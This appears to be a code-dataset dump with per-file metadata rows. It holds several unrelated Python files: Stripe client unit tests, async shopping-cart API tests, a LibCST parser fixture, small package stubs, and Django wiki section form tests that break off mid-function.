from allennlp.training.callbacks.backward import MixedPrecisionBackwardCallback, OnBackwardException
from allennlp.training.callbacks.should_validate import ShouldValidateCallback
| 67.555556 | 100 | 0.904605 | 61 | 608 | 8.95082 | 0.42623 | 0.175824 | 0.29304 | 0.424908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054276 | 608 | 8 | 101 | 76 | 0.949565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c3e0c437720f6ff6c21c471c5f3932ccf1b6631c | 131 | py | Python | phac/models/__init__.py | jusjusjus/phac-python | 107c1e3f2f80972ff675754af9b38e271f5005b9 | [
"MIT"
] | null | null | null | phac/models/__init__.py | jusjusjus/phac-python | 107c1e3f2f80972ff675754af9b38e271f5005b9 | [
"MIT"
] | null | null | null | phac/models/__init__.py | jusjusjus/phac-python | 107c1e3f2f80972ff675754af9b38e271f5005b9 | [
"MIT"
] | null | null | null | from .triangle_wave import triangle_wave
from .sin_with_noise import sin_with_noise
__all__ = ['triangle_wave', 'sin_with_noise']
| 26.2 | 45 | 0.824427 | 20 | 131 | 4.75 | 0.4 | 0.378947 | 0.378947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099237 | 131 | 4 | 46 | 32.75 | 0.805085 | 0 | 0 | 0 | 0 | 0 | 0.206107 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c3e2c38df08c796b5cdc8a4d7eb5e15deebcb4e3 | 4,749 | py | Python | tests/api_resources/abstract/test_custom_method.py | HELP-ALI-PLEASE-HE-HAS-SMA-ONLY-2-YEARS/stripe-python | 053f1a2c376dd40b723f680bfc48c624be25b5c6 | [
"MIT"
] | 1,078 | 2015-01-06T03:35:05.000Z | 2022-03-25T13:25:48.000Z | tests/api_resources/abstract/test_custom_method.py | imvickykumar999/stripe-python | e7e2ebaa53060ca75883de7f982c3fb527633022 | [
"MIT"
] | 558 | 2015-01-07T19:05:02.000Z | 2022-03-28T22:19:24.000Z | tests/api_resources/abstract/test_custom_method.py | imvickykumar999/stripe-python | e7e2ebaa53060ca75883de7f982c3fb527633022 | [
"MIT"
] | 382 | 2015-01-04T14:06:09.000Z | 2022-03-16T04:52:04.000Z | from __future__ import absolute_import, division, print_function
import stripe
from stripe import util
class TestCustomMethod(object):
@stripe.api_resources.abstract.custom_method(
"do_stuff", http_verb="post", http_path="do_the_thing"
)
@stripe.api_resources.abstract.custom_method(
"do_stream_stuff",
http_verb="post",
http_path="do_the_stream_thing",
is_streaming=True,
)
class MyResource(stripe.api_resources.abstract.APIResource):
OBJECT_NAME = "myresource"
def do_stuff(self, idempotency_key=None, **params):
url = self.instance_url() + "/do_the_thing"
headers = util.populate_headers(idempotency_key)
self.refresh_from(self.request("post", url, params, headers))
return self
def do_stream_stuff(self, idempotency_key=None, **params):
url = self.instance_url() + "/do_the_stream_thing"
headers = util.populate_headers(idempotency_key)
return self.request_stream("post", url, params, headers)
def test_call_custom_method_class(self, request_mock):
request_mock.stub_request(
"post",
"/v1/myresources/mid/do_the_thing",
{"id": "mid", "thing_done": True},
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.do_stuff("mid", foo="bar")
request_mock.assert_requested(
"post", "/v1/myresources/mid/do_the_thing", {"foo": "bar"}
)
assert obj.thing_done is True
def test_call_custom_stream_method_class(self, request_mock):
request_mock.stub_request_stream(
"post",
"/v1/myresources/mid/do_the_stream_thing",
"response body",
rheaders={"request-id": "req_id"},
)
resp = self.MyResource.do_stream_stuff("mid", foo="bar")
request_mock.assert_requested_stream(
"post", "/v1/myresources/mid/do_the_stream_thing", {"foo": "bar"}
)
body_content = resp.io.read()
if hasattr(body_content, "decode"):
body_content = body_content.decode("utf-8")
assert body_content == "response body"
def test_call_custom_method_class_with_object(self, request_mock):
request_mock.stub_request(
"post",
"/v1/myresources/mid/do_the_thing",
{"id": "mid", "thing_done": True},
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
self.MyResource.do_stuff(obj, foo="bar")
request_mock.assert_requested(
"post", "/v1/myresources/mid/do_the_thing", {"foo": "bar"}
)
assert obj.thing_done is True
def test_call_custom_stream_method_class_with_object(self, request_mock):
request_mock.stub_request_stream(
"post",
"/v1/myresources/mid/do_the_stream_thing",
"response body",
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
resp = self.MyResource.do_stream_stuff(obj, foo="bar")
request_mock.assert_requested_stream(
"post", "/v1/myresources/mid/do_the_stream_thing", {"foo": "bar"}
)
body_content = resp.io.read()
if hasattr(body_content, "decode"):
body_content = body_content.decode("utf-8")
assert body_content == "response body"
def test_call_custom_method_instance(self, request_mock):
request_mock.stub_request(
"post",
"/v1/myresources/mid/do_the_thing",
{"id": "mid", "thing_done": True},
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
obj.do_stuff(foo="bar")
request_mock.assert_requested(
"post", "/v1/myresources/mid/do_the_thing", {"foo": "bar"}
)
assert obj.thing_done is True
def test_call_custom_stream_method_instance(self, request_mock):
request_mock.stub_request_stream(
"post",
"/v1/myresources/mid/do_the_stream_thing",
"response body",
rheaders={"request-id": "req_id"},
)
obj = self.MyResource.construct_from({"id": "mid"}, "mykey")
resp = obj.do_stream_stuff(foo="bar")
request_mock.assert_requested_stream(
"post", "/v1/myresources/mid/do_the_stream_thing", {"foo": "bar"}
)
body_content = resp.io.read()
if hasattr(body_content, "decode"):
body_content = body_content.decode("utf-8")
assert body_content == "response body"
| 34.165468 | 77 | 0.607075 | 556 | 4,749 | 4.861511 | 0.134892 | 0.073252 | 0.075472 | 0.08879 | 0.861635 | 0.861635 | 0.837588 | 0.770995 | 0.736959 | 0.72697 | 0 | 0.004287 | 0.263213 | 4,749 | 138 | 78 | 34.413043 | 0.768219 | 0 | 0 | 0.59633 | 0 | 0 | 0.197726 | 0.089703 | 0 | 0 | 0 | 0 | 0.110092 | 1 | 0.073395 | false | 0 | 0.027523 | 0 | 0.137615 | 0.009174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c3e5eb9d0af51018c4e53de087b71375ddba5ff8 | 37 | py | Python | helper3.py | jbf5ca/cs3240-labdemo | 21f8b6305464eb8066a481df29d8ddfc601a0c6c | [
"MIT"
] | null | null | null | helper3.py | jbf5ca/cs3240-labdemo | 21f8b6305464eb8066a481df29d8ddfc601a0c6c | [
"MIT"
] | null | null | null | helper3.py | jbf5ca/cs3240-labdemo | 21f8b6305464eb8066a481df29d8ddfc601a0c6c | [
"MIT"
] | null | null | null | def closing():
print("Good bye")
| 12.333333 | 21 | 0.594595 | 5 | 37 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 37 | 2 | 22 | 18.5 | 0.758621 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
7f1ede14ca88eb64142d1f6c93b0324e1e1724a7 | 4,242 | py | Python | src/tests/test_v1_shopping_cart_items_[id]_PUT.py | daniellima/desafio-lojaintegrada | 3cb17f4ec9769472e111adfe6d550e668518aabd | [
"MIT"
] | null | null | null | src/tests/test_v1_shopping_cart_items_[id]_PUT.py | daniellima/desafio-lojaintegrada | 3cb17f4ec9769472e111adfe6d550e668518aabd | [
"MIT"
] | null | null | null | src/tests/test_v1_shopping_cart_items_[id]_PUT.py | daniellima/desafio-lojaintegrada | 3cb17f4ec9769472e111adfe6d550e668518aabd | [
"MIT"
] | null | null | null |
async def test_update_quantity_of_item_should_be_a_success(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 2
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.get('/v1/shopping_cart')
assert resp.status == 200
assert (await resp.json()) == {
'items': [
{
'id': '5',
'name': 'Playstation 5',
'price': 3000,
'quantity': 2
}
],
'coupons': [],
'subtotal': 6000,
'total': 6000
}
resp = await client.put('/v1/shopping_cart/items/5', json={
'quantity': 5
})
assert resp.status == 200
assert (await resp.json()) == {}
resp = await client.get('/v1/shopping_cart')
assert resp.status == 200
assert (await resp.json()) == {
'items': [
{
'id': '5',
'name': 'Playstation 5',
'price': 3000,
'quantity': 5
}
],
'coupons': [],
'subtotal': 15000,
'total': 15000
}
async def test_update_quantity_of_unknow_item_should_result_in_error(client):
resp = await client.put('/v1/shopping_cart/items/999', json={
'quantity': 1
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'item_not_found',
'message': 'Item with id "999" was not found'
}
}
async def test_update_quantity_of_existing_item_not_in_shopping_cart_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 1
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/6', json={
'quantity': 1
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'item_not_found',
'message': 'Item with id "6" was not found'
}
}
async def test_update_quantity_of_item_with_quantity_greater_than_stock_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 1
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/5', json={
'quantity': 1000
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'out_of_stock',
'message': 'Item with id "5" don\'t have 1000 or more itens in stock'
}
}
async def test_update_quantity_of_item_with_empty_body_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 2
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/5', json={})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'failed_validating_json',
'message': 'Missing key: \'quantity\''
}
}
async def test_update_quantity_of_item_with_zero_quantity_should_result_in_error(client):
resp = await client.post('/v1/shopping_cart/items', json={
'id': '5',
'quantity': 1
})
assert resp.status == 201
assert (await resp.json()) == {
'id': '5',
'name': 'Playstation 5',
'price': 3000
}
resp = await client.put('/v1/shopping_cart/items/5', json={
'quantity': 0
})
assert resp.status == 400
assert (await resp.json()) == {
'error': {
'type': 'failed_validating_json',
'message': 'Key \'quantity\' must be greater than 0'
}
}
| 22.92973 | 103 | 0.522159 | 474 | 4,242 | 4.487342 | 0.154008 | 0.078984 | 0.091678 | 0.116126 | 0.868829 | 0.868829 | 0.855665 | 0.840621 | 0.755994 | 0.719323 | 0 | 0.052338 | 0.324375 | 4,242 | 184 | 104 | 23.054348 | 0.689812 | 0 | 0 | 0.690647 | 0 | 0 | 0.218345 | 0.073332 | 0 | 0 | 0 | 0 | 0.18705 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
618475825ca311cef83fee961ad67a16c8647654 | 89 | py | Python | pulotu/adapters.py | blurks/pulotu | 621460f3d4dbe05367ed4814b95d192df348cb72 | [
"Apache-2.0"
] | null | null | null | pulotu/adapters.py | blurks/pulotu | 621460f3d4dbe05367ed4814b95d192df348cb72 | [
"Apache-2.0"
] | 1 | 2021-11-19T16:50:11.000Z | 2021-11-19T16:55:17.000Z | pulotu/adapters.py | blurks/pulotu | 621460f3d4dbe05367ed4814b95d192df348cb72 | [
"Apache-2.0"
] | 1 | 2021-11-22T13:28:14.000Z | 2021-11-22T13:28:14.000Z | from clld.web.adapters.geojson import GeoJsonParameter
def includeme(config):
pass
| 14.833333 | 54 | 0.786517 | 11 | 89 | 6.363636 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146067 | 89 | 5 | 55 | 17.8 | 0.921053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4ef73f081cb6eb6e5b9d8eb825ea0c4adfc55599 | 145 | py | Python | native/libcst/tests/fixtures/expr_statement.py | jschavesr/LibCST | e5ab7b90b4c9cd1f46e5b875ad317411abf48298 | [
"Apache-2.0"
] | 880 | 2019-08-07T21:21:11.000Z | 2022-03-29T06:25:34.000Z | native/libcst/tests/fixtures/expr_statement.py | jschavesr/LibCST | e5ab7b90b4c9cd1f46e5b875ad317411abf48298 | [
"Apache-2.0"
] | 537 | 2019-08-08T18:34:30.000Z | 2022-03-30T16:46:14.000Z | native/libcst/tests/fixtures/expr_statement.py | jschavesr/LibCST | e5ab7b90b4c9cd1f46e5b875ad317411abf48298 | [
"Apache-2.0"
] | 108 | 2019-08-08T00:17:21.000Z | 2022-03-24T20:53:31.000Z | 1
1, 2, 3
x = 1
x = 1, 2, 3
x = y = z = 1, 2, 3
x, y, z = 1, 2, 3
abc = a, b, c = x, y, z = xyz = 1, 2, (3, 4)
( ( ( ... ) ) )
a , = b | 13.181818 | 44 | 0.275862 | 36 | 145 | 1.111111 | 0.333333 | 0.25 | 0.375 | 0.3 | 0.375 | 0.375 | 0.375 | 0.375 | 0.375 | 0 | 0 | 0.225 | 0.448276 | 145 | 11 | 45 | 13.181818 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f6150b4fdd3301f4570c7b75bcae5f0f827c6f26 | 92 | py | Python | flask_philo/commands_flask_philo/aws.py | maigfrga/flask-philo | f46d766c0f2607a5df193d532abb7b9cb576f909 | [
"Apache-2.0"
] | 1 | 2017-04-27T09:05:08.000Z | 2017-04-27T09:05:08.000Z | flask_philo/commands_flask_philo/aws.py | maigfrga/flask-philo | f46d766c0f2607a5df193d532abb7b9cb576f909 | [
"Apache-2.0"
] | 32 | 2016-09-30T14:42:21.000Z | 2017-11-02T14:34:34.000Z | flask_philo/commands_flask_philo/aws.py | maigfrga/flask-philo | f46d766c0f2607a5df193d532abb7b9cb576f909 | [
"Apache-2.0"
] | 7 | 2016-06-28T10:03:21.000Z | 2017-01-23T17:29:29.000Z | from flask_philo.cloud.aws import run as aws_run
def run(**kwargs):
aws_run(**kwargs)
| 15.333333 | 48 | 0.717391 | 16 | 92 | 3.9375 | 0.625 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163043 | 92 | 5 | 49 | 18.4 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f6188477061e5f2f36b403da0990ad0f317f87ad | 22,637 | py | Python | wiki/test/test_wikisectionform.py | IgalMilman/DnDHelper | 334822a489e7dc2b5ae17230e5c068b89c6c5d10 | [
"MIT"
] | null | null | null | wiki/test/test_wikisectionform.py | IgalMilman/DnDHelper | 334822a489e7dc2b5ae17230e5c068b89c6c5d10 | [
"MIT"
] | null | null | null | wiki/test/test_wikisectionform.py | IgalMilman/DnDHelper | 334822a489e7dc2b5ae17230e5c068b89c6c5d10 | [
"MIT"
] | null | null | null | import copy
import os
import uuid
from datetime import datetime, timedelta
import mock
import pytz
from django.conf import settings
from django.contrib.auth.models import User
from django.test import TestCase
from utils.widget import quill
from wiki.forms import wikisectionform
from wiki.models import wikipage, wikisection
from wiki.models.permissionsection import PermissionSection
from wiki.models.wikipage import Keywords, WikiPage
from wiki.models.wikisection import WikiSection
def render_mock(request, template, data, content_type='test'):
return {'request':request, 'template':template, 'data': data, 'content_type':content_type}
def redirect_mock(link):
return link
def reverse_mock(link, kwargs=None):
if kwargs is None:
return link
return link
class req:
def __init__(self, method='GET', post={}, user=None):
self.method = method
self.user = user
self.POST = post
class WikiSectionFormTestCase(TestCase):
def setUp(self):
self.firstUser = User(is_superuser=True, username='test1', password='test1', email='test1@example.com', first_name='testname1', last_name='testlast2')
self.secondUser = User(is_superuser=False, username='test2', password='test2', email='test2@example.com', first_name='testname2', last_name='testlast2')
self.thirdUser = User(is_superuser=False, username='test3', password='test3', email='test3@example.com', first_name='testname3', last_name='testlast3')
self.fourthUser = User(is_superuser=False, username='test4', password='test4', email='test4@example.com', first_name='testname4', last_name='testlast4')
self.firstUser.save()
self.secondUser.save()
self.thirdUser.save()
self.fourthUser.save()
self.wikiuuid = [uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4()]
self.wikistext = ['{"ops":[{"insert":"123123\\n"}]}', 'text', None]
self.wikisuuid = [uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4(), uuid.uuid4()]
self.wikipath = 'wiki'
self.wikipagelink = 'wiki_page'
self.wikimainpagelink = 'wiki_homepage'
self.softwarename = 'name'
self.formtemplate = 'forms/unimodelform.html'
self.contenttype = 'text/html'
self.createdtime = datetime.now(pytz.utc)
self.wikiPages = []
self.permissions = []
for i in range(2):
self.wikiPages.append(WikiPage(unid=self.wikiuuid[i], createdon=self.createdtime, updatedon=self.createdtime, createdby=self.firstUser, updatedby=self.secondUser, title='testpage'+str(i+1)))
self.wikiPages[i].save()
self.wikiPages[i].createdon=self.createdtime + timedelta(hours=i)
self.wikiPages[i].updatedon=self.createdtime + timedelta(hours=i)
self.wikiPages[i].save()
self.wikiSections = []
for i in range(3):
self.wikiSections.append(WikiSection(unid=self.wikisuuid[i], createdon=self.createdtime, updatedon=self.createdtime, createdby=self.firstUser, updatedby=self.secondUser, title='testsec'+str(i+1), pageorder=i+1, text=self.wikistext[i], wikipage=self.wikiPages[0]))
self.wikiSections[i].save()
self.wikiSections[i].createdon=self.createdtime + timedelta(hours=i)
self.wikiSections[i].updatedon=self.createdtime + timedelta(hours=i)
perm = PermissionSection(createdby=self.firstUser, accesslevel=10, grantedto=self.thirdUser, section=self.wikiSections[i])
perm.save()
self.permissions.append(perm)
perm = PermissionSection(createdby=self.firstUser, accesslevel=30, grantedto=self.secondUser, section=self.wikiSections[i])
perm.save()
self.permissions.append(perm)
if i==1:
self.wikiSections[1].createdby = None
self.wikiSections[1].updatedby = None
self.wikiSections[i].save()
settings.SOFTWARE_NAME_SHORT = self.softwarename
wikisectionform.settings.SOFTWARE_NAME_SHORT = self.softwarename
os.path.exists = mock.Mock(return_value=True, spec='os.path.exists')
os.makedirs = mock.Mock(return_value=None, spec='os.makedirs')
wikisectionform.render = mock.Mock(side_effect=render_mock)
wikisectionform.redirect = mock.Mock(side_effect=redirect_mock)
wikisectionform.reverse = mock.Mock(side_effect=reverse_mock)
wikipage.reverse = mock.Mock(side_effect=reverse_mock)
wikisection.reverse = mock.Mock(side_effect=reverse_mock)
def test_wiki_section_form_get_request_super_user(self):
post = {'action':'add'}
method = 'GET'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'add')
self.assertEqual(data['PAGE_TITLE'], 'Add section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Add Section')
self.assertEqual(data['submbutton'], 'Add section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_get_request_no_access(self):
method = 'GET'
request = req(method=method, user=self.thirdUser)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_get_request_no_permissions(self):
method = 'GET'
request = req(method=method, user=self.fourthUser)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_post_request_no_action_super_user(self):
post = {}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'add')
self.assertEqual(data['PAGE_TITLE'], 'Add section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Add Section')
self.assertEqual(data['submbutton'], 'Add section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_post_request_no_action_no_access(self):
post = {}
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_post_request_no_action_no_permissions(self):
post = {}
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_add_request_success(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[0])
post = form.initial
post['action'] = 'add'
method = 'POST'
WikiSection.objects.all().delete()
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
self.assertEqual(len(WikiSection.objects.all()), 1)
wikis = WikiSection.objects.all()[0]
self.assertEqual(wikis.title, self.wikiSections[0].title)
self.assertEqual(wikis.text, self.wikiSections[0].text)
self.assertEqual(wikis.pageorder, self.wikiSections[0].pageorder)
self.assertEqual(wikis.createdby, self.firstUser)
self.assertEqual(wikis.updatedby, self.firstUser)
def test_wiki_section_form_add_request_fail_no_access(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[0])
post = form.initial
post['action'] = 'add'
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_add_request_fail_no_permissions(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[0])
post = form.initial
post['action'] = 'add'
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_add_request_failed_no_title(self):
post = {'action':'add', 'title':None}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'add')
self.assertEqual(data['PAGE_TITLE'], 'Add section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Add Section')
self.assertEqual(data['submbutton'], 'Add section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertTrue(('title' in data['form'].data) or (data['form'].data == {}))
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_change_request_success(self):
post = {'action':'change', 'targetid': self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result['request'], request)
self.assertEqual(result['template'], self.formtemplate)
data = result['data']
self.assertEqual(data['action'], 'changed')
self.assertEqual(data['targetid'], self.wikiSections[0].unid)
self.assertEqual(data['PAGE_TITLE'], 'Change section: ' + self.softwarename)
self.assertEqual(data['minititle'], 'Change Section')
self.assertEqual(data['submbutton'], 'Change section')
self.assertEqual(data['deletebutton'], 'Delete section')
self.assertEqual(data['backurl'], self.wikipagelink)
self.assertEqual(data['needquillinput'], True)
self.assertIsInstance(data['form'], wikisectionform.WikiSectionForm)
self.assertTrue('title' in data['form'].initial)
self.assertEqual(data['form'].initial['title'], self.wikiSections[0].title)
self.assertEqual(data['form'].initial['pageorder'], self.wikiSections[0].pageorder)
self.assertEqual(data['form'].initial['text'], self.wikiSections[0].text)
self.assertEqual(result['content_type'], self.contenttype)
def test_wiki_section_form_change_request_fail_no_access(self):
post = {'action':'change', 'targetid': self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.thirdUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_change_request_fail_no_permissions(self):
post = {'action':'change', 'targetid': self.wikiSections[0].unid}
method = 'POST'
request = req(method=method, user=self.fourthUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_change_request_fail_no_section(self):
post = {'action':'change', 'targetid':uuid.uuid4()}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_change_request_fail_no_target_id(self):
post = {'action':'change'}
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
def test_wiki_section_form_changed_request_success_super_user(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
request = req(method=method, user=self.firstUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, self.wikiSections[1].title)
self.assertEqual(wikis.pageorder, self.wikiSections[1].pageorder)
self.assertEqual(wikis.createdby, self.firstUser)
self.assertEqual(wikis.updatedby, self.firstUser)
self.assertNotEqual(wikis.updatedon, wikis.createdon)
def test_wiki_section_form_changed_request_success_permissions(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
request = req(method=method, user=self.secondUser, post=post)
result = wikisectionform.WikiSectionFormParse(request, self.wikiPages[0].unid)
self.assertEqual(result, self.wikipagelink)
wikis = WikiSection.objects.get(unid=self.wikiSections[0].unid)
self.assertEqual(wikis.title, self.wikiSections[1].title)
self.assertEqual(wikis.pageorder, self.wikiSections[1].pageorder)
self.assertEqual(wikis.createdby, self.firstUser)
self.assertEqual(wikis.updatedby, self.secondUser)
self.assertNotEqual(wikis.updatedon, wikis.createdon)
def test_wiki_section_form_changed_request_fail_no_access(self):
form = wikisectionform.WikiSectionForm(instance=self.wikiSections[1])
post = form.initial
post['action'] = 'changed'
post['targetid'] = self.wikiSections[0].unid
method = 'POST'
oldsection = copy.deepcopy(self.wikiSections[0])
